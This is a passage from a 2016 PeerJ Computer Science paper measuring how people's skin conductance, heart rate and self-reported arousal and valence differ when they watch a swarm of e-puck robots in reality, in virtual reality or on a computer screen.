experiments should be done with real robots instead of simulation. Confirming the second hypothesis would imply that in order to mitigate the effect of the reality gap (if it is not possible to use real robots), it is better for a researcher to simulate a robot swarm in virtual reality because it provokes in humans more realistic psychophysiological reactions compared to simulated robots displayed on a computer screen. Experimental scenario We designed an experimental scenario that allowed us to study the effect of the reality gap on humans in the context of human-swarm interaction. To study the effect of the reality gap, we divided our experimental scenario into three sessions. The order of the three sessions was randomly assigned to our participants. In each session, a participant has to supervise (i.e., watch attentively) a swarm made up of 20 robots. In the so-called Real Robots session, the participant supervises a real (i.e., non-simulated) swarm of 20 robots Podevijn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.82 5/19 http://dx.doi.org/10.7717/peerj-cs.82 https://peerj.com/ (see Fig. 2A). In the Screen Simulation session, the participant supervises a simulated swarm of 20 robots displayed on a computer screen. In this session, the robot swarm is visible to the participant from the top view (see Fig. 2B). In the Virtual Reality session, the participant supervises a simulated swarm of 20 robots displayed in a virtual reality environment. The participant wears a virtual reality headset (i.e., a smartphone put in a Google virtual reality cardboard (https://www.google.com/get/cardboard) and is immersed in a 3D virtual world in which 20 simulated robots are present (see Fig. 2C). During the three sessions (i.e., Real Robots, Screen Simulation, Virtual Reality), the participant has to supervise the robots for a period of 60 s. Measures We used two types of measures: self-reported measures and psychophysiological measures. We use self-reported measures (i.e., data gathered from our participants using a dedicated psychological questionnaire) to determine whether our participants are subjectively conscious of their psychophysiological reaction changes and whether these reaction changes are positive (i.e., our participants report to have a positive experience) or negative (i.e., our participants report to have a negative experience). We use psychophysiological measures, on the other hand, to determine objectively the psychological state of our participants based on physiological responses. These psychophysiological measures are considered objective because it is difficult for humans to intentionally manipulate their physiological responses (for instance to intentionally decrease heart rate). In the following two sections, we first present the self-reported measures used in this study. Then, we present the psychophysiological measures. Self-reported measure In this study, we collect our participants’ self-reported affective state. We measure our participants’ affective state with two scales: valence and arousal. Valence is the cognitive judgement (i.e., pleasure or displeasure) of an evaluation such as the interaction with robots considered in this study. Higher valence values correspond to greater pleasure, while lower valence values correspond to a less pleasurable experience. The arousal scale assesses the mental alertness and the level of physical activity or level of excitation (Mehrabian, 1996) felt during an evaluation. Figure 2 Robots and environments for each of the three sessions. (A) View of the real robots and environment. The view is displayed from the participant’s perspective. (B) Top view of the robots and of the environment simulated on a computer and displayed on a screen. (C) View of the robots and of the environment simulated in virtual reality. The view is displayed from the participant’s perspective. Podevijn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.82 6/19 https://www.google.com/get/cardboard http://dx.doi.org/10.7717/peerj-cs.82 https://peerj.com/ We developed an open source electronic version of the Self-Assessment Manikin (SAM) questionnaire (Lang, 1980). This electronic version of the SAM questionnaire runs on a tablet device. The SAM questionnaire represents the values of the arousal scale and of the valence scale with a picture. In this version of the SAM questionnaire, each scale is composed of nine values represented by five pictures and four inter-points between each of the five pictures (i.e., a value of the scale that is not represented by a picture). The tablet application displays the scales in a vertical arrangement where the top-most picture represents the lowest level of the scale (e.g., lowest level of arousal), and the bottom-most picture represents the highest level of the scale (e.g., highest level of arousal). Each picture and each inter-point are associated with a numerical score. Numerical scores vary from 1 to 9. In the valence scale, 1 corresponds to the lowest level of valence (i.e., pleasure is minimal) and 9 corresponds to the highest level of valence (i.e., pleasure is maximal). In the arousal scale, 1 corresponds to the lowest level of arousal (i.e., excitement is minimal) and 9 corresponds to the highest level of arousal (i.e., excitement is maximal). Fig. 3 shows a screen-shot of the SAM questionnaire running on a tablet device. Psychophysiological measure Physiological responses can be used to study the human psychophysiological state (e.g., emotional state or cognitive state). Physiological responses are activated by the autonomic nervous system. The autonomic nervous system is divided into the sympathetic nervous system and the parasympathetic nervous system. The sympathetic nervous system is considered to be responsible for the activation of the fight-or-flight physiological responses (i.e., physiological responses in case of stress). The parasympathetic nervous system, on the other hand, is considered to be responsible for maintaining physiological responses to a normal activity (i.e., the physiological responses at rest). The electrodermal activity (i.e., the skin’s electrical activity) and the cardiovascular activity are two common physiological activities used in the literature to study the autonomic nervous system. In this research, we study our participants’ electrodermal activity by monitoring their skin conductance level (SCL) and we study our participants’ cardiovascular activity by monitoring their heart rate. The SCL is a slow variation of the skin conductance over time and is measured in microsiemens (mS). An increase of the SCL is only due to an increase of the sympathetic nervous system activity. It is, therefore, a measure of choice to study the human fight-or- flight response. SCL has also been correlated to the affective state’s arousal (Boucsein, 2012). The heart rate is the number of heart beats per unit of time. It is usually measured in beats per minute (BPM). Unlike the SCL though, variation of the heart rate can not be unequivocally associated with a variation of the sympathetic nervous system only. Heart rate can vary due to either a variation of the sympathetic nervous system, a variation of the parasympathetic nervous system, or a combination of both (Cacioppo, Tassinary & Berntson, 2007). Heart rate activity is, therefore, more difficult to analyse and interpret than the SCL. Because the physiological responses can vary between individuals, it is difficult to compare the physiological responses of an individual with those of another. In order Podevijn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.82 7/19 http://dx.doi.org/10.7717/peerj-cs.82 https://peerj.com/ Figure 3 Electronic version of the Self-Assessment Manikin questionnaire. (A) the valence scale. The top-most picture corresponds to the lowest level of valence. The bottom-most picture corresponds to the highest level of valence. (B) the arousal scale. The top-most picture corresponds to the lowest level of arousal. The bottom-most picture corresponds to the highest level of arousal. The pictures used in the application are taken from and available at http://www.pxlab.de (last access: April 2016). Podevijn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.82 8/19 http://www.pxlab.de http://dx.doi.org/10.7717/peerj-cs.82 https://peerj.com/ to compare the physiological responses between our participants, we first recorded our participants’ physiological responses at rest (i.e., the baseline), then we recorded our participants’ physiological responses during the experiment. In our statistical analyses, we use the difference between our participants’ physiological responses at rest and during the experiment. Equipment and experimental setup Physiological response acquisition We monitored our participants’ physiological responses with a PowerLab 26T (ADInstruments) data acquisition system augmented with a GSR Amp device. The PowerLab 26T was connected via USB to a laptop computer running Mac OSX Yosemite. We used the software LabChart 8 to record the physiological responses acquired by the PowerLab 26T data acquisition system. We used an infrared photoelectric sensor (i.e., a photopletismograph) to measure the blood volume pulse (BVP) of our participants (i.e., changes in the pulsatile blood flow). The blood volume pulse can be retrieved from the photopletismograph from the peripheral parts of the human body such as on the fingers. We can compute the heart rate from the blood volume pulse. Firstly, we calculate the inter-beat interval (IBI) (i.e., time in seconds between two peaks in the blood volume pulse). Then, we calculate the heart rate by dividing 60 by the IBI. For instance, if the IBI of an individual is 1 s, this individual’s heart rate is 60 BPM. Fig. 4A shows the blood volume pulse of a participant during a time window of 10 s. The photopletismograph was attached to the index finger of a participants dominant hand. The photopletismograph was directly connected to the PowerLab 26T. To monitor the electrodermal activity of our participants, we used brightly polished stainless steel bipolar electrodes connected to the GSR Amp device. These bipolar electrodes were attached to the medial phalanxes of the index and middle fingers of a participants non-dominant hand. In order to monitor the skin conductance, the GSR Amp device applies a direct constant voltage between the bipolar electrodes. The constant voltage is small enough (i.e., 22 mV) to prevent the participants from feeling it. As the voltage is known and constant (22 mV), the GSR Amp device can measure the current between the bipolar electrodes. When the current is known, the GSR Amp device can calculate the conductance of the skin by applying the Ohm’s law (conductance is the current measured between the electrodes divided by the constant voltage applied by the GSR Amp device between the electrodes). Fig. 4B shows the skin conductance of a participant during a time window of 10 s. Environment and robot behaviour In all of the three sessions of our experimental scenario (i.e., Real Robots, Virtual Reality, Screen Simulation), we used a square environment of dimension 2 � 2 m. Fig. 2 shows the environment of each of the three sessions. At the beginning of each session, 20 robots are randomly placed in the environment. When an experiment starts, the 20 robots perform a random walk with obstacle avoidance behaviour for a period of 60 s. Each robot executes the two following steps: i) it drives straight with a constant velocity of 10 cm/s, Podevijn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.82 9/19 http://dx.doi.org/10.7717/peerj-cs.82 https://peerj.com/ and ii) it changes its direction when it encounters either a robot or an obstacle in the direction of movement (i.e., it turns in place until the obstacle is no longer detected in the front part of its chassis). Robot platform The platform used in this study is the wheeled e-puck robot (see Fig. 5) equipped with an extension board. The e-puck robot is designed for educational and research purposes (Mondada et al., 2009). The extended version of the e-puck robot is 13 cm high and has a diameter of 7 cm. In this study, we used only a limited subset of the sensors and actuators available to the e-puck robot: the proximity sensors, and the wheel actuators. See Mondada et al. (2009) and Gutiérrez et al. (2008) for further details and for a complete list of the sensors and actuators available on the e-puck platform. We programmed the e-puck robots using the software infrastructure described in Garattoni et al. (2015). Participants We recruited 28 participants from the campus population of the Université Libre de Bruxelles. All participants were between 18 and 29 years old with an average age of 22.75 years old (SD = 3.28). We considered current or anterior cardiovascular problems that could act on the central nervous system as exclusion criteria (i.e., we excluded potential participants with cardiovascular problems). Our participants received an informed consent form explaining that they were filmed during the experiment and that their physiological responses were being collected for research purpose only. At the end of the experiment, we offered a 7V financial incentive for participation. Figure 4 Physiological measures. (A) The graph of a participant’s blood volume pulse during 10 s. The BVP does not have a standard unit. The x-axis is the time in minutes since the beginning of the recording. The time between two peaks (depicted with two dots connected with a line on the picture) is called the inter-beat interval (IBI). The participant’s heart rate (the number of beats per minute) is computed by dividing 60 by the inter-beat interval. In this example, the mean heart rate of the parti- cipant during these 10 s is of 87 BPM. (B) The graph of a participant’s skin conductance during 10 s. The skin conductance’s unit is the microsiemens (y-axis). The x-axis is the time in minutes since the beginning of the recording. The skin conductance is computed by measuring the current flowing between two electrodes and by dividing this current by a constant voltage applied between the electrodes. The skin conductance level of this participant during these 10 s is of 5.17 mS. Podevijn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.82 10/19 http://dx.doi.org/10.7717/peerj-cs.82 https://peerj.com/ Ethics statement Our participants gave their written informed consent. The experiment was approved by the Ethics Committee of the Faculty of Psychology, Université Libre de Bruxelles (approval number: 061/2015). Experimental procedure We conducted our experiments in the robotic experiment room of the artificial intelligence laboratory at the Université Libre de Bruxelles. Upon arrival, we explained to the participant that she was going to supervise, i.e., watch attentively, a swarm of robots with three different types of visualization interfaces (i.e., on a computer screen, in a virtual reality headset and in reality with real robots). We then showed to the participant the swarm of robots displayed in the three visualization interfaces. The participant was allowed to look at a computer screen displaying a top view of a swarm of robots, to wear the virtual reality headset and to look at the real robots. Once the participant was familiar with the three visualization interfaces, we presented and explained how to answer the electronic version of the SAM questionnaire. Then, we invited the participant to read and sign the consent form. We then asked the participant to wash their hands in clear water (i.e., with no soap) and to remain seated on a chair placed in a corner of the environment used for the Real Robots session (see Fig. 1). We attached the participant to two physiological sensors (i.e., a pulse transducer for measuring the participants cardiovascular activity and two finger electrodes for measuring the participants electrodermal activity). We proceeded with a 5 min rest period in order to collect the participant’s physiological baseline (i.e., physiological responses at rest). After the 5 min rest period, we started the first session. After each session, we asked the participant to answer the SAM questionnaire. Before starting the next session of the experiment, we collected the participant’s baseline during an additional 3 min rest period. This 3 min rest period allowed the participant to get back to a normal physiological activity. During the whole duration of the experiment, the participant remained seated on the same chair. During the Real Robots session, the participant was immersed in the environment in which the robots were randomly moving. Prior to the Virtual Reality session, we attached Figure 5 An e-puck robot used in our experiments. The proximity sensors are used to detect and avoid nearby robots. The wheel actuators are set to a speed of 10 cm/s. Podevijn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.82 11/19 http://dx.doi.org/10.7717/peerj-cs.82 https://peerj.com/ the virtual reality headset to the participant. Prior to the Screen Simulation session, we placed a computer screen in front of the participant. After the experiment ended, we detached the sensors from the participant and conducted a brief interview with her. During the interview, we explained to the participant the goal of the study. Then, we answered our participant’s questions. We finished the experiment by thanking the participant and by giving the participant the 7V incentive. The entire experiments duration was 30 min per participant. DATA ANALYSIS AND RESULTS Out of the 28 participants who took part to the experiment, we had to remove the physiological data (i.e., heart rate and skin conductance) of five participants due to sensor misplacement. We, however, kept the self-reported data (i.e., valence and arousal values reported by the SAM questionnaire) of these five participants. In the following of this section, we analyse the psychophysiological data of 23 participants (15 female and 8 male) and the self-reported data of 28 participants (17 female and 11 male). We conducted our analyses with the R software (R Core Team, 2015) by performing a repeated measures design analysis. Because the data was not normally distributed, we did not use the repeated measure ANOVA test (as the test assumes a normal distribution). Rather, we used a non-parametric Friedman test to analyse both the psychophysiological data and the self-reported data (i.e., the SAM questionnaire). The Friedman test is a rank-based test that does not make any assumption on the distribution of the data. In our case, the Friedman test’s null hypothesis is that the medians of the three sessions Real Robots, Virtual Reality and Screen Simulation are the same. In the case of statistical significance of the Friedman test (i.e., at least one session has a different median), we performed a Wilcoxon rank-signed test to evaluate the significance difference between sessions. When the Wilcoxon rank-signed test performed on two sessions is significant, we can conclude that the medians of these two sessions are significantly different. We applied a Bonferroni-Holm correction to the p-values returned by the Wilcoxon rank-signed test to take account of the Type I error (i.e., reject the null hypothesis while it is true). In addition to determining the effect of the reality gap on our participants, we also determined whether psychophysiological data and self-reported data were correlated (e.g., whether skin conductance is correlated with arousal, or whether arousal and valence are correlated). In order to determine this correlation, we performed a Spearman’s rank-order correlation test. We present in Table 1 the results of the psychophysiological and self-reported data (i.e., median and Friedman’s mean rank of heart rate, SCL, arousal and valence) in each session (i.e., Real Robots, Virtual Reality, Screen Simulation) as well as the inference statistics of the Friedman tests (i.e., p-values and �2). Psychophysiological data We did not find any main effect of the reality gap on our participants’ heart rate (�2(2) = 0.78, p = 0.67). However, we found a main effect of the reality gap on our participants’ SCL (�2(2) = 15.2, p < 0.001). Pairwise comparisons on the SCL data Podevijn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.82 12/19 http://dx.doi.org/10.7717/peerj-cs.82 https://peerj.com/ showed a statistical difference between the Virtual Reality session and the Real Robots session (Z = 3.9, p < 0.001) and between the Screen Simulation session and the Real Robots session (Z = 3.13, p < 0.001) but not between the Screen Simulation session and the Virtual Reality session (Z = 0.9, p = 0.3), see Fig. 6B. Self-reported data We found a main effect of the reality gap on our participants’ arousal (�2(2) = 19, p < 0.001) and on our participants’ valence (�2(2) = 24.87, p < 0.001). Pairwise comparisons on the arousal data showed statistical differences between the Screen Simulation session and the Real Robots session (Z = 3.97, p < 0.001) and between the Screen Simulation session and the Virtual Reality session (Z = 2.55, p < 0.05). There was no statistical difference between the Virtual Reality session and the Real Robots session (Z = 1.52, p = 0.13), see Fig. 6C. Pairwise comparisons on the valence data showed statistical differences between the Virtual Reality session and the Real Robots session (Z = 3.6, p < 0.001) and between the Screen Simulation session and the Real Robots session (Z = 4, p < 0.001). Pairwise comparisons do not show any statistical difference between the Screen Simulation session and the Virtual Reality session (Z = 0.78, p = 0.4), see Fig. 6D. Correlations In addition to studying the effect of the reality gap on our participants, we investigated whether or not some of the dependent variables (i.e., heart rate, skin conductance, arousal and valence) were pair-wise correlated. In order to calculate a correlation between psychophysiological data and self-reported data (e.g., correlation between skin conductance and arousal) we only took into account the self-reported data of the participants whose psychophysiological data had not been rejected (due to sensor misplacement). For the correlation test between arousal and valence we took the 28 participant data points. We did not find any correlation within each of the three sessions (i.e., there was no correlation for any pair-wise dependent variable within the Real Robots session nor the Virtual Reality session nor the Screen Simulation session). We, therefore, investigated whether there was some correlations when the data of each condition was pooled together (e.g., we aggregated skin conductance values from the three sessions). Regarding correlation between psychophysiological data and self-reported data, we found a correlation between skin conductance and valence (ρ = 0.42, p < 0.001) and a weak correlation between skin conductance and arousal (ρ = 0.253, p = 0.03). Table 1 Results of the psychophysiological data and of the self-reported data. We provide the median and the Friedman’s mean rank (in parentheses) of the three sessions (Real Robots, Virtual Reality, Screen Simulation). We also provide the inference statistics of the Friedman test (i.e., �2 and p). Dependent variable n Real Robots Virtual Reality Screen Simulation �2 p Heart rate 23 0.39 (1.87) 1.01 (2) 1.44 (2.13) � 2 (2) = 0.78 0.67 SCL 23 4.91 (2.65) 1.54 (1.78) 0.77 (1.57) �2(2) = 15.2 < 0.001 Arousal 28 6 (2.45) 5 (2.16) 3 (1.39) �2(2) = 19 < 0.001 Valence 28 7 (2.73) 6 (1.71) 5 (1.55) � 2 (2) = 24.87 < 0.001 Podevijn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.82 13/19 http://dx.doi.org/10.7717/peerj-cs.82 https://peerj.com/ There was no correlation between heart rate and valence and between heart rate and arousal. Concerning the self-reported data, we found a correlation between arousal and valence (ρ = 0.32, p = 0.002). We did not find any correlation between heart rate and skin conductance. Gender effect and session order effect Finally, we also studied the gender effect (i.e., whether females and males differ in their results) and the session order effect (i.e., whether the participants become habituated to the experiment). We analysed the gender effect by splitting into two groups the males’ and females’ results of each dependent variable (i.e., heart rate, skin conductance, arousal and valence) for each condition (i.e., Screen Simulation, Virtual Reality, Real Robots). We compared these two groups with a Wilcoxon rank-sum test—the equivalent test of the Wilcoxon rank-signed test for independent groups. We did not find any statistically significant difference between males and females in any condition, for any dependent variable. We studied the session order effect as follows. For each condition and for each dependent variable, we separated into three groups the results of the participants who encountered the session first, second or third, respectively. We compared the three groups with a Kruskall-Wallis test—a non-parametric test similar to a Friedman test but for independent groups. We did not find any statistically significant difference among the Figure 6 (A) Boxplots of the heart rate, (B) skin conductance level, (C) arousal and (D) valence. We visually report the median value of each session with the bold horizontal line. We report the outliers with the dots. Two boxplots are connected when the sessions are significantly different. Podevijn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.82 14/19 http://dx.doi.org/10.7717/peerj-cs.82 https://peerj.com/ three groups in any session, for any dependent variable, suggesting that the session order had no significant effect on our participants. DISCUSSION AND CONCLUSION In this paper, we presented a study on the effect of the reality gap on the psychophysiological reactions of humans interacting with a robot swarm. We had two hypotheses. The first hypothesis stated that humans interacting with a real (i.e., non- simulated) robot swarm have stronger psychophysiological reactions than if they were interacting with a simulated robot swarm. The second hypothesis stated that humans interacting with a simulated robot swarm displayed in a virtual reality environment have stronger psychophysiological reactions than if they were interacting with a simulated robot swarm displayed on a computer screen. Both the self-reported data (i.e., arousal and valence) and the psychophysiological data (i.e., skin conductance) show that the reality gap has an effect on the human psychophysiological reactions. Our participants had stronger psychophysiological reactions when they were confronted to a real swarm of robots than when they were confronted to a simulated robot swarm (in virtual reality and on a computer screen). These results confirm our first hypothesis. Of course, it is not always possible for researchers to conduct a human-swarm interaction study with real robots, essentially because real robots are still very expensive for a research lab and real robot experiments are time consuming. It is, therefore, not realistic to expect human-swarm interaction researchers to conduct human-swarm interaction experiments with dozens or hundreds of real robots. For this reason, we decided to investigate the possibility of using virtual reality in order to mitigate the effect of the reality gap. To the best of our knowledge, virtual reality has yet never been used in the research field of human-swarm interaction and is little studied in social robotics (Li, 2015). Only the self-reported arousal show that our participants had stronger reactions during simulation in virtual reality than during simulation on a computer screen. With these results, we can not strongly confirm our second hypothesis. However, the results of the skin conductance and the self-reported valence, combined with the significant results of the arousal, both show a trend of our participants to have stronger psychophysiological responses in virtual reality than in front of a computer screen. In this paper, we designed our experiment based on a purely passive interaction scenario. In a passive interaction scenario, human operators do not issue commands to a robot swarm. We motivated our choice of a passive interaction by the fact that an active interaction could influence the human psychophysiological state (making it difficult to separate the effect of the active interaction and the effect of the reality gap on our participants’ psychophysiological state). However, now that we have shown the effect of the reality gap in a purely passive interaction scenario, future work should focus on this effect in an active interaction scenario in which human operators do issue commands to a robot swarm. For instance, we could use the results presented in this paper Podevijn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.82 15/19 http://dx.doi.org/10.7717/peerj-cs.82 https://peerj.com/ as a baseline and compare them with those of an active interaction scenario in which human operators have to guide a swarm in an environment. In human-swarm interaction, as for any interactive system, it is fundamental to understand the psychological impact of the system on a human operator. To date, in human-swarm interaction research, such understanding is very limited, and worse is often based purely on the study of simulated systems. In this study, we showed that performing a human-swarm interaction study with real robots, compared to simulated robots, significantly changes how humans psychophysiologically react. We, therefore, recommend to use as much as possible real robots for human-swarm interaction research. We also showed that in simulation, a swarm displayed in virtual reality tends to provoke stronger responses than a swarm displayed on a computer screen. These results, therefore, tend to show that if it is not possible for a researcher to use real robots, virtual reality is a better choice than simulation on a computer screen. Even though more research should focus on this statement, we encourage researchers in human-swarm interaction to consider using virtual reality when it is not possible to use a swarm of real robots. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was partially supported by the European Research Council through the ERC Advanced Grant “E-SWARM: Engineering Swarm Intelligence Systems” (contract 246939). Rehan O’Grady and Marco Dorigo received support from the Belgian F.R.S.–FNRS. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: European Research Council through the ERC Advanced Grant “E-SWARM: Engineering Swarm Intelligence Systems”: 246939. Competing Interests Marco Dorigo is an Academic Editor for PeerJ Computer Science. Author Contributions � Gaëtan Podevijn conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. � Rehan O’Grady conceived and designed the experiments, reviewed drafts of the paper. � Carole Fantini-Hauwel conceived and designed the experiments, contributed reagents/ materials/analysis tools, reviewed drafts of the paper. � Marco Dorigo conceived and designed the experiments, contributed reagents/materials/ analysis tools, reviewed drafts of the paper. Podevijn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.82 16/19 http://dx.doi.org/10.7717/peerj-cs.82 https://peerj.com/ Ethics The following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): Ethics Committee of the Faculty of Psychology, Université libre de Bruxelles, Approval number: 061/2015. Data Deposition The following information was supplied regarding data availability: The raw data has been supplied as Supplemental Dataset Files. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/ 10.7717/peerj-cs.82#supplemental-information. REFERENCES Amraii SA, Walker P, Lewis M, Chakraborty N, Sycara K. 2014. Explicit vs. tacit leadership in influencing the behavior of swarms. In: Proceedings of IEEE/RSJ International Conference on Robotics and Automation (ICRA). Piscataway: IEEE Press, 2209–2214. Bashyal S, Venayagamoorthy GK. 2008. Human swarm interaction for radiation source search and localization. In: Swarm Intelligence Symposium. Piscataway: IEEE, 1–8. Bethel CL, Burke JL, Murphy RR, Salomon K. 2007. Psychophysiological experimental design for use in human-robot interaction studies. In: Proceedings of the International Symposium on Collaborative Technologies and Systems (CTS). Piscataway: IEEE, 99–105. Boucsein W. 2012. Electrodermal Activity. Second edition. New York: Springer Science & Business Media. Cacioppo JT, Tassinary LG, Berntson GG. 2007. Handbook of Psychophysiology. Vol. 2. New York: Cambridge University Press. Carroll JM. 1997. Human-computer interaction: psychology as a science of design. Annual Review of Psychology 48(1):61–83 DOI 10.1146/annurev.psych.48.1.61. De la Croix J-P, Egerstedt M. 2012. Controllability characterizations of leader-based swarm interactions. In: AAAI Fall Symposium Series Technical Reports. Washington, D.C.: AAAI Press. Dorigo M, Birattari M, Brambilla M. 2014. Swarm robotics. Scholarpedia 9(1):1463 DOI 10.4249/scholarpedia.1463. Dorigo M, Floreano D, Gambardella LM, Mondada F, Nolfi S, Baaboura T, Birattari M, Bonani M, Brambilla M, Brutschy A, Burnier D, Campo A, Christensen AL, Decugnière A, Di Caro G, Ducatelle F, Ferrante E, Förster A, Guzzi J, Longchamp V, Magnenat S, Martinez Gonzales J, Mathews N, Montes de Oca M, O’Grady R, Pinciroli C, Pini G, Rétornaz P, Roberts J, Sperati V, Stirling T, Stranieri A, Stützle T, Trianni V, Tuci E, Turgut AE, Vaussard F. 2013. Swarmanoid: a novel concept for the study of heterogeneous robotic swarms. IEEE Robotics & Automation Magazine 20(4):60–71 DOI 10.1109/MRA.2013.2252996. Fasola J, Matari�c M. 2013. A socially assistive robot exercise coach for the elderly. Journal of Human-Robot Interaction 2(2):3–32 DOI 10.5898/JHRI.2.2.Fasola. Garattoni L, Francesca G, Brutschy A, Pinciroli C, Birattari M. 2015. Software infrastructure for E-puck (and TAM). Technical Report TR/IRIDIA/2015-004. Brussels: IRIDIA, Université Libre de Bruxelles. Available at http://iridia.ulb.ac.be/~lgarattoni/uploads/4/4/1/9/44195969/ iridiatr2015-004.pdf. Podevijn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.82 17/19 http://dx.doi.org/10.7717/peerj-cs.82/supp-1 http://dx.doi.org/10.7717/peerj-cs.82#supplemental-information http://dx.doi.org/10.7717/peerj-cs.82#supplemental-information http://dx.doi.org/10.1146/annurev.psych.48.1.61 http://dx.doi.org/10.4249/scholarpedia.1463 http://dx.doi.org/10.1109/MRA.2013.2252996 http://dx.doi.org/10.5898/JHRI.2.2.Fasola http://iridia.ulb.ac.be/~lgarattoni/uploads/4/4/1/9/44195969/iridiatr2015-004.pdf http://iridia.ulb.ac.be/~lgarattoni/uploads/4/4/1/9/44195969/iridiatr2015-004.pdf http://dx.doi.org/10.7717/peerj-cs.82 https://peerj.com/ Gutiérrez A, Campo A, Dorigo M, Amor D, Magdalena L, Monasterio-Huelin F. 2008. An open localization and local communication embodied sensor. Sensors 8(11):7545–7563 DOI 10.3390/s8117545. Hegel F, Muhl C, Wrede B, Hielscher-Fastabend M, Sagerer G. 2009. Understanding social robots. In: Proceedings of the 2nd International Conferences on Advances in Computer-Human Interactions (ACHI 2009). Piscataway: IEEE, 169–174. Kidd C, Breazeal C. 2004. Effect of a robot on user perceptions. In: Proceedings of the IEEE/RSJ International Conference on Intelligent Robots and System (IROS) Volume 4. Piscataway: IEEE Computer Society Press, 3559–3564. Kolling A, Sycara K, Nunnally S, Lewis M. 2013. Human swarm interaction: an experimental study of two types of interaction with foraging swarms. Journal of Human-Robot Interaction 2(2):103–128 DOI 10.5898/jhri.2.2.kolling. Kolling A, Walker P, Chakraborty N, Sycara K, Lewis M. 2016. Human interaction with robot swarms: a survey. IEEE Transaction on Human-Machine Systems 46(1):9–26 DOI 10.1109/THMS.2015.2480801. Lang PJ. 1980. Behavioral treatment and bio-behavioral assessment: computer applications. In: Sidowski JB, Johnson JH, Williams TH, eds. Technology in Mental Health Care Delivery Systems. Norwood: Ablex, 119–137. Leite I, Pereira A, Martinho C, Paiva A. 2008. Are emotional robots more fun to play with? In: Proceedings of the 17th IEEE International Symposium on Robot and Human Interactive Communication (ROMAN). Piscataway: IEEE Press, 77–82. Li J. 2015. The benefit of being physically present: a survey of experimental works comparing copresent robots, telepresent robots and virtual agents. International Journal of Human- Computer Studies 77:23–37 DOI 10.1016/j.ijhcs.2015.01.001. Mehrabian A. 1996. Pleasure-arousal-dominance: a general framework for describing and measuring individual differences in temperament. Current Psychology 14(4):261–292 DOI 10.1007/BF02686918. Mondada F, Bonani M, Raemy X, Pugh J, Cianci C, Klaptocz A, Magnenat S, Zufferey J-C, Floreano D, Martinoli A. 2009. The E-Puck, a robot designed for education in engineering. In: Proceedings of the 9th Conference on Autonomous Robot Systems and Competitions. Portugal: Instituto Politècnico de Castelo Branco, 59–65. Nagavalli S, Chien S-Y, Lewis M, Chakraborty N, Sycara K. 2015. Bounds of neglect benevolence in input timing for human interaction with robotic swarms. In: Proceedings of ACM/IEEE International Conference on Human-Robot Interaction. New York: ACM, 197–204. Nagi J, Giusti A, Gambardella LM, Di Caro GA. 2014. Human-swarm interaction using spatial gestures. In: Proceedings of the 27th IEEE/RSJ International Conference on Intelligent Robots and Systems (IROS). Piscataway: IEEE Computer Society, 3834–3841. Nagi J, Ngo H, Gambardella L, Di Caro GA. 2015. Wisdom of the swarm for human-swarm interaction. In: Proceedings of the IEEE International Conference on Robotics and Automation (ICRA). Piscataway: IEEE, 1802–1808. Nunnally S, Walker P, Lewis M, Kolling A, Chakraborty N, Sycara K. 2012. Connectivity differences between human operators of swarms and bandwidth limitations. In: Proceedings of the Third international conference on Swarm, Evolutionary, and Memetic Computing. Berlin, Heidelberg: Springer, 713–720. Podevijn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.82 18/19 http://dx.doi.org/10.3390/s8117545 http://dx.doi.org/10.5898/jhri.2.2.kolling http://dx.doi.org/10.1109/THMS.2015.2480801 http://dx.doi.org/10.1016/j.ijhcs.2015.01.001 http://dx.doi.org/ 10.1007/BF02686918 http://dx.doi.org/10.7717/peerj-cs.82 https://peerj.com/ Pendleton B, Goodrich MA. 2013. Scalable human interaction with robotic swarms. In: Proceedings of the AIAA Infotech@Aerospace Conference. Reston: American Institute of Aeronautics and Astronautics, 633–645. Pereira A, Martinho C, Leite I, Paiva A. 2008. iCat, the chess player: the influence of embodiment in the enjoyment of a game. In: Proceedings of the 7th International Joint Conference on Autonomous Agents and Multiagent Systems. Richland: International Foundation for Autonomous Agents and Multiagent Systems, 1253–1256. Podevijn G, O’Grady R, Mathews N, Gilles A, Fantini-Hauwel C, Dorigo M. 2016. Investigating the effect of increasing robot group sizes on the human psychophysiological state in the context of human-swarm interaction. Swarm Intelligence 10(3):1–18 DOI 10.1007/s11721-016-0124-3. Podevijn G, O’Grady R, Nashed YSG, Dorigo M. 2013. Gesturing at subswarms: towards direct human control of robot swarms. Towards Autonomous Robotic Systems–14th Annual Conference, TAROS 2013 Volume 8069 of Lecture Notes in Computer Science. Berlin: Springer, 390–403. Powers A, Kiesler S, Fussell S, Torrey C. 2007. Comparing a computer agent with a humanoid robot. In: Proceedings of the 2nd ACM/IEEE International Conference on Human-Robot Interaction (HRI). New York: ACM, 145–152. R Core Team. 2015. R: A Language and Environment for Statistical Computing. Vienna, Austria: R Foundation for Statistical Computing. Available at http://www.R-project.org/. Setter T, Fouraker A, Kawashima H, Egerstedt M. 2015. Haptic interactions with multi-robot swarms using manipulability. Journal of Human-Robot Interaction 4(1):60–74 DOI 10.5898/JHRI.4.1.Setter. Sweetser P, Wyeth P. 2005. GameFlow: a model for evaluating player enjoyment in games. Computers in Entertainment 3(3):3 DOI 10.1145/1077246.1077253. Wainer J, Feil-Seifer DJ, Shell DA, Matari�c MJ. 2007. Embodiment and human-robot interaction: a task-based perspective. In: Proceedings of the 16th IEEE International Symposium on Robot and Human Interactive Communication (ROMAN). Piscataway: IEEE Press, 872–877. Walker P, 